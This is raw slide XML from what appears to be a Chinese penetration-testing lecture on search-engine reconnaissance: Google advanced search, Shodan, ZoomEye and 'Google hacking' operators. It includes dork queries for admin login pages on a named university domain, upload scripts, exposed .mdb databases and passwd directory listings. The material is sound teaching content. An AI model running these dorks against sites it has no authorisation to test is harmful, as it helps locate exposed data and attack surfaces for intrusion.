            <a:off x="374649" y="1206499"/>
            <a:ext cx="11642618" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Google搜索技术融合了用于执行Google的详细搜索的高级搜索技术。在Google首页右下角可以点击“Settings”-&gt;”Advanced search”进行详细设置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="image22.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="263170" y="3092086"/>
            <a:ext cx="12736979" cy="5506247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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8" name="Shape 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465191" y="7462369"/>
            <a:ext cx="11642618" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>在高级设置页面可以设置“所有字”、“精确的字或短语”、“含以下任何字”、“不含以下任何字”、“数字范围”、“语言”、“地区”、“最新更新”、“网站或域名”、“关键字出现位置”、“安全搜索”、“阅读级别”、“文件类型”、“使用权限”等等，更精确的搜索</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="249" name="image23.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267149" y="583529"/>
            <a:ext cx="12340902" cy="6658762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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51" name="image24.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482665" y="2739090"/>
            <a:ext cx="9844129" cy="7328568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263649" y="1028699"/>
            <a:ext cx="10646490" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>由于一些众所周知的原因，我们在不能欢快滴科学上网的时候，会用到国内的一些搜索引擎。同样也是可以设置的，不过相对而言没Google强大。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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4" name="Shape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286701" y="152399"/>
            <a:ext cx="11351896"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500"/>
            </a:pPr>
            <a:r>
              <a:t>渗透测试中还有一些非常好用的搜索引擎，比如shodan(</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.shodan.io/</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>下面是搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>sogou.com</a:t>
            </a:r>
            <a:r>
              <a:t>的返回结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="image25.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408859" y="1556869"/>
            <a:ext cx="13389691" cy="7503461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549908" y="177799"/>
            <a:ext cx="1187958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点击第一个结果的Details可以查看详细信息，包括地理位置、服务器开放的端口等等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="image26.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="976502" y="893606"/>
            <a:ext cx="11349634" cy="8534125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179155" y="76199"/>
            <a:ext cx="10646490" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>除了shodan之外，当然还不得不提知道创宇的“钟馗之眼”-&gt; ZoomEye  分分钟吊炸天有木有？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152048" y="7962900"/>
            <a:ext cx="471836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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>推荐余弦的《ZoomEye高级黑》</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="image27.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165624" y="1430521"/>
            <a:ext cx="10673495" cy="5907123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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4" name="Shape 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="3639009"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Google hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484027" y="1290406"/>
            <a:ext cx="10712374" cy="2844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500"/>
            </a:pPr>
            <a:r>
              <a:t>对于普通的用户而言，Google是一个强大的搜索引擎；而对于黑客而言，则可能是一款绝佳的黑客工具。正因为google的检索能力强大，黑客可以构造特殊的关键字语法，使用Google搜索互联网上的相关隐私信息。通过Google，黑客甚至可以在几秒种内黑掉一个网站。这种利用Google搜索相关信息并进行入侵的过程就叫做Google Hack。 下面介绍一些常用的所谓“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>谷歌黑客语法</a:t>
            </a:r>
            <a:r>
              <a:t>”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Shape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387666" y="4305299"/>
            <a:ext cx="6729096"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例如批量查找学校网站的后台   输入如下关键字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345615" y="4825999"/>
            <a:ext cx="12643769"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>site:hdu.edu.cn  intext:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="image28.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1861211" y="5562600"/>
            <a:ext cx="9860688" cy="4444568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453230" y="279399"/>
            <a:ext cx="12745086" cy="1153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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>intext: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>把网页中的正文内容中的某个字符做为搜索条件.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>例如在google里输入:intext:杭电.将返回所有在网页正文部分包含"杭电"的网页 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>allintext:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>使用方法和intext类似. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>intitle: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>搜索网页标题中是否有我们所要找的字符.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>例如搜索:intitle:杭电.将返回所有网页标题中包含"杭电"的网页.同理allintitle:也同intitle类似. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>cache: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>搜索google里关于某些内容的缓存,有时候往往能找到一些好东西. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>define: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>搜索某个词的定义,例如搜索:define:杭电,将返回关于“杭电”的定义. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>filetype: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>搜索制定类型的文件，例如：filetype:doc.将返回所有以doc结尾的文件URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>info: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>查找指定站点的一些基本信息. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>inurl: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>搜索我们指定的字符是否存在于URL中.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>例如输入:inurl:admin,将返回N个类似于这样的连接:http://xxx/admin,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>常用于查找通用漏洞、注入点、管理员登录的URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>allinurl:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>也同inurl类似,可指定多个字符. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>link: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>例如搜索:inurl:hdu.edu.cn可以返回所有和hdu.edu.cn做了链接的URL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>site: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>搜索指定域名,如site:hdu.edu.cn.将返回所有和hdu.edu.cn有关的URL. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955780" y="402166"/>
            <a:ext cx="5704206" cy="330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500"/>
            </a:pPr>
            <a:r>
              <a:t>还有一些*作符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>+ 把google可能忽略的字列如查询范围 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>- 把某个字忽略 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>~ 同意词 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>. 单一的通配符 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>* 通配符，可代表多个字母 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>"" 精确查询 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982132" y="4085166"/>
            <a:ext cx="773430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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实际操作时需根据情况组合使用，下面列举些常用的：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048808" y="4732865"/>
            <a:ext cx="5935663" cy="436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500"/>
            </a:pPr>
            <a:r>
              <a:t>intext:to parent directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>intext:转到父目录/转到父路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>inurl:upload.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>intitle:powered by xxx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>index of/upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Filetype:mdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>inurl:robots.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>intitle:index.of "parent directory" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>index of /passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>site:xxx.com filetype:mdb|ini|php|asp|jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>…. ….</a:t>
            </a:r>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1" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944561" y="2674936"/>
            <a:ext cx="11554126" cy="523054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l" defTabSz="914400">
              <a:defRPr sz="2600">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>什么是渗透测试(Pentest)？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>渗透测试是指从一个攻击者的角度来检查和审核一个网络系统的安全性的过程。通常有安全工程师尽可能完整地模拟黑客使用的漏洞发现技术和攻击手段，对目标网络</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>应用的安全性做深入的探测，发现系统最脆弱的环节。渗透测试能够直观的让管理人员知道自己网络所面临的问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>渗透测试最简单直接的解释就是：完全站在攻击者角度对目标系统进行的安全性测试过程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
